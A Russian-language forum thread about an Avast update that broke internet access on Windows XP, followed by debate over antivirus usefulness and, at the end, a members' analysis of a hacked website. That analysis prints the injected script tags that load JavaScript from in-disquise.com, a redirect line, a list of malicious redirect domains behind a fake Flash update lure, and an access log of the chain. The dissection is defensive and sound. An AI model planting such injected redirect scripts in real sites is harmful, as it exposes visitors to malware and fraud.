Jump to content
Калькуляторы

Как Avast от интернетов отключал

По нашей статистике пострадали лишь нелицензионные Windows XP (Zver Edition, например). Кто-нибудь пострадал на лицензионной Windows XP?

 

Поскольку всё выглядит как-раз наоборот: Avast единственный антивирус, заметивший попытку создания огромного ботнета. А его все хаят.

 

Очень интересен данный вопрос.

полная чушь. Это лишь очередное подтверждение что аваст дерьмо и работает для галочки. Пострадали абсолютно все XP, и сборки и не сборки. Лично воспроизвел это на чистой винде. Наш Контакт центр чуть не повешался. Радует 1но - после этого его хоть ставить меньше будут.

Share this post


Link to post
Share on other sites

По нашей статистике пострадали лишь нелицензионные Windows XP (Zver Edition, например). Кто-нибудь пострадал на лицензионной Windows XP?

 

Поскольку всё выглядит как-раз наоборот: Avast единственный антивирус, заметивший попытку создания огромного ботнета. А его все хаят.

 

Очень интересен данный вопрос.

 

Берем N+1 компьютеров (для простоты на физический хост, ставим ESXi и на нем создаем виртуалки) устанавливаем на все компьютеры лицензионный windows XP. Различие будет одно - на первом windows без антивруса вообще. на втором с касперским. на третьем с авастом, дрвебом, симантеком, и тд.

Всё ПО ставится из коробки. То есть с родного CD microsoft, родного CD из коробки антиврусника. Больше никакого ПО ставить нельзя.

По условиям эксперимента разрешается сходить на сайт обновлений винды и антивриусника.

 

Весь трафик этих машин мониторим и пишем в лог. Оставляем и на время забываем. Вообще не трогаем.

Через месяц (30 календарных дней) вдумчиво анализируем кто куда ходил и зачем.

 

Мне в этом вопросе обычно никто не верит "на слово". Зато получив собственные логи оппоненты вопросы снимают.

Там совсем не сложно сравнить лог от чистой винды и винды с "антиврусом".

Share this post


Link to post
Share on other sites

кардинальная борьбы с вирусами: нет интернета - нет вирусов :)

агащас. а флешка с фоткаме из отпуска побывавшая уже у ярда юзеров не считается? можно конечно отключить usb, но я помню cdr с на заводе прошитым вирусом. а давайте отключим cdrom! а про вирус в bios забыли? щас вон и телевизор бывает возмущается - "а чо это интернет отвалился?" получается нет смысла бороться с вирусами, надо учиться с ними жить.

Зачем отключать весь cdrom? Достаточно отключить автозапуск. Зачем учиться жить с вирусами, это доставляет удовольствие?

Share this post


Link to post
Share on other sites

Наш Контакт центр чуть не повешался. Радует 1но - после этого его хоть ставить меньше будут.

Знакомая с Украины 3 дня без инета из-за аваста сидела. А у нее работа - через интернет...

Share this post


Link to post
Share on other sites

Ребята, лучший антивирус это отсутствие административных привилегий в повседневной работе(или нормально работающий UAC).

Share this post


Link to post
Share on other sites

С другой стороны после фейла аваста число установок дрвебов по подписке увеличилось, приятно =)

Share this post


Link to post
Share on other sites

В офисе - да. А вот дома без админских прав игры часто не пашут. Как то пробовал "огородить" комп родственникам. Не вышло. Сидят под админами...

Ещё не встретил ни одной игры, которая не работала бы без админских прав (антиквариат не считаем).

Правда иногда админские права нужны не только для установки, но и для первого запуска (факинг ДРМ!).

Игры ставятся на диск D:, на который у пользователя полные права, плюс семёрочный UAC для запуска инсталлера "от админа" - уже с год полёт нормальный.

"Для галочки" стоит AVG, но ниразу ничего кроме кейгенов-кряков и т.п. и авторанов на флешке он не поймал.

Share this post


Link to post
Share on other sites
Может имел в виду НЕ отжирает ? У меня 5 мегабайт MSE занимает судя по диспетчеру задач, во всех режимах работы, то есть в фоне, с открытым окном, с открытым окном и сканированием.

На ХР точно отжирает от 250мб и больше, на семёрках не смотрел / не помню, там памяти обычно много и проц мощный.

Там жрёт не гуяшная морда, а служба: mpeng (или как то так, её видно при копировании файлов как жруна процессора).

 

А не надо такие программы держать на дисках :)

Вот ещё, будут всякие мне указывать. Вот я и не держу антивирусов.

 

 

В офисе - да. А вот дома без админских прав игры часто не пашут. Как то пробовал "огородить" комп родственникам. Не вышло. Сидят под админами...

Дома тоже не сложно.

Есть простые рекомендации:

- новые игрушки (после 2006 года);

- ставить в папку в своём профиле (куда полный доступ);

- уровень пользователя - выше среднего.

Я лично патчил старые (2000 - 2005) игры чтобы без прав админа пахали. Большинству хватало полного доступа на отдельные файлы/подпапки из своей папки и на ветки реестра в HKLM где игрушка хранит свои настройки. Чтобы вечно не давать права на реестр я в бинарнике менял константу "ПОЛНЫЙ ДОСТУП" на "ДОСТУП НА ЧТЕНИЕ" в аргументе функции открытия ключа в реестре. Обычно 3-5 замен в бинарнике.

Ещё был вариант поменять HKLM на HKCU, но это менее кошерно.

С переездом на х64 семёрку (или 2к3 сервер) некоторые старые игрушки перестали работать, не смотря на все мои попытки.

Share this post


Link to post
Share on other sites

На ХР точно отжирает от 250мб и больше, на семёрках не смотрел / не помню, там памяти обычно много и проц мощный.

Там жрёт не гуяшная морда, а служба: mpeng (или как то так, её видно при копировании файлов как жруна процессора).

MsMpEng

в простое 40 МБ, при сканировании прыгало до 90, но большую часть времени держалось на 60.

Share this post


Link to post
Share on other sites

MSE мы ставим у себя в офисе, работает сносно. В виду того, что все за натом - от виросов не страдаем. Сколько он кушает не мониторили - но народ не жалуется на тормоза (а компы у многих ещё на 478 сокете:) )

Share this post


Link to post
Share on other sites

Странно, у меня нет проблем. Ставил этот антивирь многим друзьям, вроде не жаловались...

Да и на мой взгляд работает вполне нормально, тормозов нет. А вот раньше когда был лиц. "КАсперыч", были тормоза.

Share this post


Link to post
Share on other sites

Странно, у меня нет проблем. Ставил этот антивирь многим друзьям, вроде не жаловались...

Да и на мой взгляд работает вполне нормально, тормозов нет. А вот раньше когда был лиц. "КАсперыч", были тормоза.

какой именно касперский?

Share this post


Link to post
Share on other sites
MSE мы ставим у себя в офисе, работает сносно. В виду того, что все за натом - от виросов не страдаем. Сколько он кушает не мониторили - но народ не жалуется на тормоза (а компы у многих ещё на 478 сокете:) )

Даже с гигом памяти на 1,7 целероне (478) под ХР работать практически не возможно - ацкие тормоза, выжирает проц.

Если меньше гига - система постоянно свопит.

Но это проблема не антивируса, а сама система слабая.

На двуядерниках с 2гб оперативы тормоза от антивируса слабо заметны. (если не копировать большие архивы %) )

 

Для тех кто не в курсе.

Основные способы заражения:

- баннер-реддирект на сайт которые сканит на дыры и суёт эксплоиты, обычно они ориентируются на дырки в акробате и суют пдф специально составленные (притом может вполне приличный сайт быть с которого через баннерную систему каждого n-го посетителя пробует инфецировать, либо хостинг ломается и в шаблоны дописывается хитрый саморасшифровывающийся джаваскрипт);

- всякие обманки: типа загрузчик очень нужного и редкого файла, которого больше нигде нет, или просто кино скачать;

- флешки и прочие съёмные носители.

 

Да, есть ещё вирусы которые сканят по ип в поисках дырявых сервисов или открытых шар, если шара находится то там заражаются ехе файлы. Но это редкость, из за натов и дефолтных настроек ппп соединений.

Share this post


Link to post
Share on other sites

сканят по ип в поисках дырявых сервисов или открытых шар,

дневной список уникальных ипешнигов откуда ломились показать?)

на ссх для начала.

про всякие сканеры веб-дыр и подборки для вордпресса - пока умолчим. тысячи и тысячи попыток. если нет авто-блокираторов.

 

про умных админов рассказывать не надо.

Share this post


Link to post
Share on other sites

На венде нет ссш, и веб сервера.

У меня нет автоблокираторов, зато есть в инете и ссш и веб, не сказать что сильно напрягают. Ещё по рдп ломятся, но тоже толку с них мало.

И сколько ваши ломщики составляют от адресного пространства ипв4? 0,0001%?)

Share this post


Link to post
Share on other sites

0,0001%?)

ну тут вопрос же не в том сколько ломщиков и сколько серверов наломают

 

тут вопрос в том какая популярность у этих серверов. а там уже всё зависит от.

Share this post


Link to post
Share on other sites

К вопросу мозгов и антивируса

перейдите по первой ссылке http://yandex.ru/yandsearch?text=1%D0%B0%D0%B0%D1%81&lr=45

переходит на подложный сайт, данный подложный сайт редиректится только при переходе с поисковика.

https://www.virustotal.com/file/96b2ac92e33b97d6077327f191f7863fde5d1df720f47b34ab9c0b921546d89c/analysis/1355252466/

ловит 9 штук тока , 6 часов прошло как отправил касперскому , 0 эмоций

примоеденяюсь к высказыванием по поводу не панацеи антивируса и ограниченных прав пользователя.

 

Зы: по первой ссылке трояна скачать можно.

Share this post


Link to post
Share on other sites

перейдите по первой ссылке

да, редиректит на подложный сайт где тут же просит обновить адобе флеш плеер, была бы винда словил бы точно что нибудь.

по прямому адресу заходит нормально.

да, то же много звонков, все ХР и не имеет значение пиратка или лицензия, было несколько звонков с видовс 7 как бы протокол был цел в отличии от ХР где были пустые поля в свойствах, но инет не работал, после обновления аваста все работало.

 

Да! Читайте, устаревший вы наш: http://yandex.ru/yan...955453&lr=11453

что правда? а что теперь делать? и когда они появились? а то я сижу в своей деревне и не чего не знаю, как раньше сидел под ХР так сейчас под линукс и что то как то не получается что то словить с инета, может они (вирусы) до моей деревне не доходят? и по первой ссылке как то прошел и ни чего не заметил. ну да редирек, ну да просит обновить, а оно мне зачем? у меня стоит и работает, может не последней версии, а зачем она последняя если баги не обнаружил в этой.

вообще то есть некий вредоносный код, но его еще надо запустить у себя в системе что бы что то попортить, а так все вирусы это от wine, даже порно банеры не обходят стороной того кто под wine юзает мозилу.

да, аваст немного попортил нервы, причем большая часть абонентов считает что проблема на стороне провайдера.

Share this post


Link to post
Share on other sites

была бы винда словил бы точно что нибудь.

если быть дебилом то да.

это как в анекдоте — У меня вчера друг сервак сломал. — Он что хакер? — Нет, он — мудак.

 

 

по прямому адресу заходит нормально.

как не спецу интересно, сайт взломан ? , банеров, левых, вроде как нет.

Share this post


Link to post
Share on other sites

У меня вчера друг сервак сломал. — Он что хакер? — Нет, он — мудак.

это точно :) :) :)

 

как не спецу интересно, сайт взломан ?

как не спец не спецу, конечно ломанули, и именно когда вы приходите редиректом с другого сайта например с поисковика то срабатывает подложка, если вы напрямую набираете адрес то нет, так как это рассчитано на не опытных пользователей которые очень часто пользуются поисковиками для того что бы найти тот или иной адрес, тот кто постоянно пользуются одними и теми же ресурсами то запомнить url думаю не сложно, тем более хром если что подскажет. в хроме в адресной строке если начать набирать адрес 1ааа то редирект не срабатывает, при чем в кеше нет этого сайта (так как на той машине что пробовал еще этот сайт не открывался), если прыгнуть с сайта google.ru то то же самое, получаем подложку.

Edited by sherwood

Share this post


Link to post
Share on other sites

Настучать по ручкам паршивцу...

 

WHOIS information for locz.ru:***

 

[Querying whois.ripn.net]

[whois.ripn.net]

% By submitting a query to RIPN's Whois Service

% you agree to abide by the following terms of use:

% http://www.ripn.net/about/servpol.html#3.2 (in Russian)

% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain: LOCZ.RU

nserver: ns1.sweel.ru.

nserver: ns2.sweel.ru.

state: REGISTERED, DELEGATED, VERIFIED

 

person: Private Person

registrar: REGRU-REG-RIPN

admin-contact: http://www.reg.ru/whois/admin_contact

created: 2012.06.06

paid-till: 2013.06.06

free-date: 2013.07.07

source: TCI

Last updated on 2012.12.12 04:51:33 MSK

Share this post


Link to post
Share on other sites
К вопросу мозгов и антивирусаперейдите по первой ссылке http://yandex.ru/yan...%B0%D1%81&lr=45переходит на подложный сайт, данный подложный сайт редиректится только при переходе с поисковика.

Красота, люблю такие штуки изучать, прям квест :)

Там в конце хтмл дописано:

 


<script type="text/javascript" src='http://in-disquise.com/jquery.js'></script>
<script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script>

и уже тот скрипт проверяет наличие редиректа с поисковиков и шлёт дальше

document.location.href=('http://dnnn.ru/?dle&hostname='+hostname+'&fullpath='+fullpath);

и вероятно там ещё дальше могут слать...

Эта цепочка трафика, обратно по цепочке идёт бабло за переходы и инсталяции.

 

https://www.virustot...sis/1355252466/ловит 9 штук тока , 6 часов прошло как отправил касперскому , 0 эмоций

И?

У меня есть не новые вирусы, которые половина из этого списка не определяет.

И другие старые вирусы, которые другая половина определяет а первая нет.

Потому болт на антивирусы, это не серьёзно.

 

Настучать по ручкам паршивцу...

Их там не один...

Share this post


Link to post
Share on other sites

что правда? а что теперь делать? и когда они появились? а то я сижу в своей деревне и не чего не знаю, как раньше сидел под ХР так сейчас под линукс и что то как то не получается что то словить с инета...

 

Блаженны...

Share this post


Link to post
Share on other sites

по прямому адресу заходит нормально.

как не спецу интересно, сайт взломан ? , банеров, левых, вроде как нет.

Зайди на сайт, открой исходник и мотай до последних 2 строчек.

Share this post


Link to post
Share on other sites

Цепочка доменов которые используются для впаривания зловредов с этого сайта:

in-disquise.com
dnnn.ru
dddl.ru
locz.ru
cddd.ru
jjjo.ru

dddl.ru - для тех кто с мобильного, там развод на платные смс.

 

"in-disquise.com" "GET /jquery.js HTTP/1.1" 200 1937 "http://www.1aas.ru/"
"dnnn.ru" "GET /?dle&hostname=www.1aas.ru&fullpath=www.1aas.ru/ HTTP/1.1" 302 0 "http://www.1aas.ru/"
"www.1aas.ru.locz.ru" "GET /?site=www.1aas.ru/ HTTP/1.1" 302 2545 "http://www.1aas.ru/"
"www.1aas.ru.locz.ru" "GET /? HTTP/1.1" 200 2545 "http://www.1aas.ru/"
"www.1aas.ru.locz.ru" "GET /important.css?v=382 HTTP/1.1" 200 1012 "http://www.1aas.ru.locz.ru/?"
"adobe.jjjo.ru" "GET /rast/js/jquery.simplemodal.js HTTP/1.1" 200 9769 "http://www.1aas.ru.locz.ru/?"
"adobe.jjjo.ru" "GET /rast/js/jquery.js HTTP/1.1" 200 92555 "http://www.1aas.ru.locz.ru/?"
"adobe.jjjo.ru" "GET /rast/images/contentheader_topshadow.png HTTP/1.1" 200 974 "http://www.1aas.ru.locz.ru/important.css?v=382"
"adobe.jjjo.ru" "GET /rast/images/flash_128.jpg HTTP/1.1" 200 16137 "http://www.1aas.ru.locz.ru/important.css?v=382"

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this